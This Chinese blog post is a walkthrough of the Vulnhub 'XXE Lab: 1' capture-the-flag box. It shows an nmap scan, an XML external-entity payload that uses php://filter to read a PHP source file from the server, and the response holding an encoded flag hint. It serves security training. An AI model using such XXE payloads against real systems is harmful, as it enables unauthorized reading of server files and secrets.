XXE Lab：1题解

原创

Owefsad 2018-11-07 20:24:32 博主文章分类：CTF | OSCP ©著作权

文章标签 XXE XXE Lab Vulnhub 文章分类 网络安全

©著作权归作者所有：来自51CTO博客作者Owefsad的原创作品，请联系作者获取转载授权，否则将追究法律责任

思路

题目已经提示是XXE的专项练习，所以，直接找XXE问题.

难度

入门

端口扫描

nmap -sS -A 10.129.10.64

发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件

80端口检查

其中，/xxe/index.php页面通过xml格式提交用户名和密码，于是，此处即为XXE所在位置。构造如下payload，读取页面源码，获得一不知是flag还是flag Hint的内容：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root><name>&admin;</name><password>123</password></root>

响应：

<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->

于是，陷入蒙蔽。。。。等待作者反馈中

上一篇：ms07-029漏洞学习

下一篇：bigdata - zookeeper笔记（一）

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯